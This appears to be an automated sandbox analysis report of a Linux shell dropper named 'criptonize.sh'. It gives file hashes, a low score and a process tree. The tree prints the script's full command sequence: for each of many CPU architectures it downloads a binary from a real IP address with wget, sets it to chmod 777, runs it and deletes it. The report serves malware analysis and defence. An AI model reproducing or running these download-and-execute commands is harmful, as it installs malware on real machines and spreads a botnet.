Resubmissions

27-08-2024 23:50

240827-3vw9rsxdrg 8

27-08-2024 23:49

240827-3t1wkaxdpd 8

27-08-2024 23:47

240827-3svyxsxdlf 8

27-08-2024 23:45

240827-3rvlrsxdjc 3

Analysis

  • max time kernel
    69s
  • max time network
    71s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    27-08-2024 23:45

General

  • Target

    criptonize.sh

  • Size

    9KB

  • MD5

    fe5b1cae588f9ad418e162262b65b865

  • SHA1

    c0ab765270f811bcdbb0ad9f4ed2871edcf58caf

  • SHA256

    5231c1a078c018a6abea6fadde67300a961c9b528743464806246a3be619b405

  • SHA512

    b9c079cbb03cc31ba0163dbfe3d9a8fda594010717f48d29880496e31b3852fb90423e6291b1697e09c52d72f6bd1f4405021aa63d652a0c96853fff25055774

  • SSDEEP

    96:rK7IcSgf29gv+1XVYmm6Wdw9Iu8f/s2CIjTgSWuI:cERlnySeZy

Score
3/10

Malware Config

Signatures

  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/criptonize.sh
    /tmp/criptonize.sh
    1⤵
      PID:708
      • /bin/rm
        rm -f criptonize.x86_64
        2⤵
          PID:710
        • /usr/bin/wget
          wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64
          2⤵
          • Writes file to tmp directory
          PID:711
        • /bin/chmod
          chmod 777 criptonize.x86_64
          2⤵
            PID:733
          • /tmp/criptonize.x86_64
            ./criptonize.x86_64 x86_64
            2⤵
              PID:734
            • /bin/rm
              rm -f criptonize.x86_64
              2⤵
                PID:738
              • /bin/rm
                rm -f criptonize.i686
                2⤵
                  PID:739
                • /usr/bin/wget
                  wget -O criptonize.i686 http://212.60.5.174/criptonize.i686
                  2⤵
                  • Writes file to tmp directory
                  PID:740
                • /bin/chmod
                  chmod 777 criptonize.i686
                  2⤵
                    PID:818
                  • /tmp/criptonize.i686
                    ./criptonize.i686 i686
                    2⤵
                      PID:819
                    • /bin/rm
                      rm -f criptonize.i686
                      2⤵
                        PID:821
                      • /bin/rm
                        rm -f criptonize.i586
                        2⤵
                          PID:822
                        • /usr/bin/wget
                          wget -O criptonize.i586 http://212.60.5.174/criptonize.i586
                          2⤵
                          • Writes file to tmp directory
                          PID:823
                        • /bin/chmod
                          chmod 777 criptonize.i586
                          2⤵
                            PID:824
                          • /tmp/criptonize.i586
                            ./criptonize.i586 i586
                            2⤵
                              PID:825
                            • /bin/rm
                              rm -f criptonize.i586
                              2⤵
                                PID:827
                              • /bin/rm
                                rm -f criptonize.i486
                                2⤵
                                  PID:828
                                • /usr/bin/wget
                                  wget -O criptonize.i486 http://212.60.5.174/criptonize.i486
                                  2⤵
                                  • Writes file to tmp directory
                                  PID:829
                                • /bin/chmod
                                  chmod 777 criptonize.i486
                                  2⤵
                                    PID:830
                                  • /tmp/criptonize.i486
                                    ./criptonize.i486 i486
                                    2⤵
                                      PID:831
                                    • /bin/rm
                                      rm -f criptonize.i486
                                      2⤵
                                        PID:833
                                      • /bin/rm
                                        rm -f criptonize.aarch64
                                        2⤵
                                          PID:834
                                        • /usr/bin/wget
                                          wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64
                                          2⤵
                                          • Writes file to tmp directory
                                          PID:835
                                        • /bin/chmod
                                          chmod 777 criptonize.aarch64
                                          2⤵
                                            PID:836
                                          • /tmp/criptonize.aarch64
                                            ./criptonize.aarch64 aarch64
                                            2⤵
                                              PID:837
                                            • /bin/rm
                                              rm -f criptonize.aarch64
                                              2⤵
                                                PID:839
                                              • /bin/rm
                                                rm -f criptonize.armv7l
                                                2⤵
                                                  PID:840
                                                • /usr/bin/wget
                                                  wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l
                                                  2⤵
                                                  • Writes file to tmp directory
                                                  PID:841
                                                • /bin/chmod
                                                  chmod 777 criptonize.armv7l
                                                  2⤵
                                                    PID:845
                                                  • /tmp/criptonize.armv7l
                                                    ./criptonize.armv7l armv7l
                                                    2⤵
                                                      PID:846
                                                    • /bin/rm
                                                      rm -f criptonize.armv7l
                                                      2⤵
                                                        PID:848
                                                      • /bin/rm
                                                        rm -f criptonize.armv6l
                                                        2⤵
                                                          PID:849
                                                        • /usr/bin/wget
                                                          wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l
                                                          2⤵
                                                          • Writes file to tmp directory
                                                          PID:850
                                                        • /bin/chmod
                                                          chmod 777 criptonize.armv6l
                                                          2⤵
                                                            PID:851
                                                          • /tmp/criptonize.armv6l
                                                            ./criptonize.armv6l armv6l
                                                            2⤵
                                                              PID:852
                                                            • /bin/rm
                                                              rm -f criptonize.armv6l
                                                              2⤵
                                                                PID:854
                                                              • /bin/rm
                                                                rm -f criptonize.armv5l
                                                                2⤵
                                                                  PID:855
                                                                • /usr/bin/wget
                                                                  wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l
                                                                  2⤵
                                                                  • Writes file to tmp directory
                                                                  PID:856
                                                                • /bin/chmod
                                                                  chmod 777 criptonize.armv5l
                                                                  2⤵
                                                                    PID:857
                                                                  • /tmp/criptonize.armv5l
                                                                    ./criptonize.armv5l armv5l
                                                                    2⤵
                                                                      PID:858
                                                                    • /bin/rm
                                                                      rm -f criptonize.armv5l
                                                                      2⤵
                                                                        PID:860
                                                                      • /bin/rm
                                                                        rm -f criptonize.armv4eb
                                                                        2⤵
                                                                          PID:861
                                                                        • /usr/bin/wget
                                                                          wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb
                                                                          2⤵
                                                                          • Writes file to tmp directory
                                                                          PID:862
                                                                        • /bin/chmod
                                                                          chmod 777 criptonize.armv4eb
                                                                          2⤵
                                                                            PID:863
                                                                          • /tmp/criptonize.armv4eb
                                                                            ./criptonize.armv4eb armv4eb
                                                                            2⤵
                                                                              PID:864
                                                                            • /bin/rm
                                                                              rm -f criptonize.armv4eb
                                                                              2⤵
                                                                                PID:866
                                                                              • /bin/rm
                                                                                rm -f criptonize.armv4tl
                                                                                2⤵
                                                                                  PID:867
                                                                                • /usr/bin/wget
                                                                                  wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl
                                                                                  2⤵
                                                                                  • Writes file to tmp directory
                                                                                  PID:868
                                                                                • /bin/chmod
                                                                                  chmod 777 criptonize.armv4tl
                                                                                  2⤵
                                                                                    PID:869
                                                                                  • /tmp/criptonize.armv4tl
                                                                                    ./criptonize.armv4tl armv4tl
                                                                                    2⤵
                                                                                      PID:870
                                                                                    • /bin/rm
                                                                                      rm -f criptonize.armv4tl
                                                                                      2⤵
                                                                                        PID:872
                                                                                      • /bin/rm
                                                                                        rm -f criptonize.armv4l
                                                                                        2⤵
                                                                                          PID:873
                                                                                        • /usr/bin/wget
                                                                                          wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l
                                                                                          2⤵
                                                                                          • Writes file to tmp directory
                                                                                          PID:874
                                                                                        • /bin/chmod
                                                                                          chmod 777 criptonize.armv4l
                                                                                          2⤵
                                                                                            PID:875
                                                                                          • /tmp/criptonize.armv4l
                                                                                            ./criptonize.armv4l armv4l
                                                                                            2⤵
                                                                                              PID:876
                                                                                            • /bin/rm
                                                                                              rm -f criptonize.armv4l
                                                                                              2⤵
                                                                                                PID:878
                                                                                              • /bin/rm
                                                                                                rm -f criptonize.mips64
                                                                                                2⤵
                                                                                                  PID:879
                                                                                                • /usr/bin/wget
                                                                                                  wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64
                                                                                                  2⤵
                                                                                                  • Writes file to tmp directory
                                                                                                  PID:880
                                                                                                • /bin/chmod
                                                                                                  chmod 777 criptonize.mips64
                                                                                                  2⤵
                                                                                                    PID:881
                                                                                                  • /tmp/criptonize.mips64
                                                                                                    ./criptonize.mips64 mips64
                                                                                                    2⤵
                                                                                                      PID:882
                                                                                                    • /bin/rm
                                                                                                      rm -f criptonize.mips64
                                                                                                      2⤵
                                                                                                        PID:884
                                                                                                      • /bin/rm
                                                                                                        rm -f criptonize.mips
                                                                                                        2⤵
                                                                                                          PID:885
                                                                                                        • /usr/bin/wget
                                                                                                          wget -O criptonize.mips http://212.60.5.174/criptonize.mips
                                                                                                          2⤵
                                                                                                          • Writes file to tmp directory
                                                                                                          PID:886
                                                                                                        • /bin/chmod
                                                                                                          chmod 777 criptonize.mips
                                                                                                          2⤵
                                                                                                            PID:887
                                                                                                          • /tmp/criptonize.mips
                                                                                                            ./criptonize.mips mips
                                                                                                            2⤵
                                                                                                              PID:888
                                                                                                            • /bin/rm
                                                                                                              rm -f criptonize.mips
                                                                                                              2⤵
                                                                                                                PID:890
                                                                                                              • /bin/rm
                                                                                                                rm -f criptonize.mipsel
                                                                                                                2⤵
                                                                                                                  PID:891
                                                                                                                • /usr/bin/wget
                                                                                                                  wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel
                                                                                                                  2⤵
                                                                                                                  • Writes file to tmp directory
                                                                                                                  PID:892
                                                                                                                • /bin/chmod
                                                                                                                  chmod 777 criptonize.mipsel
                                                                                                                  2⤵
                                                                                                                    PID:893
                                                                                                                  • /tmp/criptonize.mipsel
                                                                                                                    ./criptonize.mipsel mipsel
                                                                                                                    2⤵
                                                                                                                      PID:894
                                                                                                                    • /bin/rm
                                                                                                                      rm -f criptonize.mipsel
                                                                                                                      2⤵
                                                                                                                        PID:895
                                                                                                                      • /bin/rm
                                                                                                                        rm -f criptonize.powerpc
                                                                                                                        2⤵
                                                                                                                          PID:896
                                                                                                                        • /usr/bin/wget
                                                                                                                          wget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc
                                                                                                                          2⤵
                                                                                                                          • Writes file to tmp directory
                                                                                                                          PID:897
                                                                                                                        • /bin/chmod
                                                                                                                          chmod 777 criptonize.powerpc
                                                                                                                          2⤵
                                                                                                                            PID:898
                                                                                                                          • /tmp/criptonize.powerpc
                                                                                                                            ./criptonize.powerpc powerpc
                                                                                                                            2⤵
                                                                                                                              PID:899
                                                                                                                            • /bin/rm
                                                                                                                              rm -f criptonize.powerpc
                                                                                                                              2⤵
                                                                                                                                PID:901
                                                                                                                              • /bin/rm
                                                                                                                                rm -f criptonize.m68k
                                                                                                                                2⤵
                                                                                                                                  PID:902
                                                                                                                                • /usr/bin/wget
                                                                                                                                  wget -O criptonize.m68k http://212.60.5.174/criptonize.m68k
                                                                                                                                  2⤵
                                                                                                                                  • Writes file to tmp directory
                                                                                                                                  PID:903
                                                                                                                                • /bin/chmod
                                                                                                                                  chmod 777 criptonize.m68k
                                                                                                                                  2⤵
                                                                                                                                    PID:904
                                                                                                                                  • /tmp/criptonize.m68k
                                                                                                                                    ./criptonize.m68k m68k
                                                                                                                                    2⤵
                                                                                                                                      PID:905
                                                                                                                                    • /bin/rm
                                                                                                                                      rm -f criptonize.m68k
                                                                                                                                      2⤵
                                                                                                                                        PID:907
                                                                                                                                      • /bin/rm
                                                                                                                                        rm -f criptonize.sh4
                                                                                                                                        2⤵
                                                                                                                                          PID:908
                                                                                                                                        • /usr/bin/wget
                                                                                                                                          wget -O criptonize.sh4 http://212.60.5.174/criptonize.sh4
                                                                                                                                          2⤵
                                                                                                                                          • Writes file to tmp directory
                                                                                                                                          PID:909
                                                                                                                                        • /bin/chmod
                                                                                                                                          chmod 777 criptonize.sh4
                                                                                                                                          2⤵
                                                                                                                                            PID:910
                                                                                                                                          • /tmp/criptonize.sh4
                                                                                                                                            ./criptonize.sh4 sh4
                                                                                                                                            2⤵
                                                                                                                                              PID:911
                                                                                                                                            • /bin/rm
                                                                                                                                              rm -f criptonize.sh4
                                                                                                                                              2⤵
                                                                                                                                                PID:913
                                                                                                                                              • /bin/rm
                                                                                                                                                rm -f criptonize.sparc
                                                                                                                                                2⤵
                                                                                                                                                  PID:914
                                                                                                                                                • /usr/bin/wget
                                                                                                                                                  wget -O criptonize.sparc http://212.60.5.174/criptonize.sparc
                                                                                                                                                  2⤵
                                                                                                                                                  • Writes file to tmp directory
                                                                                                                                                  PID:915
                                                                                                                                                • /bin/chmod
                                                                                                                                                  chmod 777 criptonize.sparc
                                                                                                                                                  2⤵
                                                                                                                                                    PID:916
                                                                                                                                                  • /tmp/criptonize.sparc
                                                                                                                                                    ./criptonize.sparc sparc
                                                                                                                                                    2⤵
                                                                                                                                                      PID:917
                                                                                                                                                    • /bin/rm
                                                                                                                                                      rm -f criptonize.sparc
                                                                                                                                                      2⤵
                                                                                                                                                        PID:919
                                                                                                                                                      • /bin/rm
                                                                                                                                                        rm -f criptonize.arc700
                                                                                                                                                        2⤵
                                                                                                                                                          PID:920
                                                                                                                                                        • /usr/bin/wget
                                                                                                                                                          wget -O criptonize.arc700 http://212.60.5.174/criptonize.arc700
                                                                                                                                                          2⤵
                                                                                                                                                          • Writes file to tmp directory
                                                                                                                                                          PID:921
                                                                                                                                                        • /bin/chmod
                                                                                                                                                          chmod 777 criptonize.arc700
                                                                                                                                                          2⤵
                                                                                                                                                            PID:922
                                                                                                                                                          • /tmp/criptonize.arc700
                                                                                                                                                            ./criptonize.arc700 arc700
                                                                                                                                                            2⤵
                                                                                                                                                              PID:923
                                                                                                                                                            • /bin/rm
                                                                                                                                                              rm -f criptonize.arc700
                                                                                                                                                              2⤵
                                                                                                                                                                PID:925
                                                                                                                                                              • /bin/rm
                                                                                                                                                                rm -f criptonize.bsdamd64
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:926
                                                                                                                                                                • /usr/bin/wget
                                                                                                                                                                  wget -O criptonize.bsdamd64 http://212.60.5.174/criptonize.bsdamd64
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Writes file to tmp directory
                                                                                                                                                                  PID:927
                                                                                                                                                                • /bin/chmod
                                                                                                                                                                  chmod 777 criptonize.bsdamd64
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:928
                                                                                                                                                                  • /tmp/criptonize.bsdamd64
                                                                                                                                                                    ./criptonize.bsdamd64 bsdamd64
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:929
                                                                                                                                                                    • /bin/rm
                                                                                                                                                                      rm -f criptonize.bsdamd64
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:931

                                                                                                                                                                    Network

                                                                                                                                                                    MITRE ATT&CK Matrix

                                                                                                                                                                    Replay Monitor

                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                    Downloads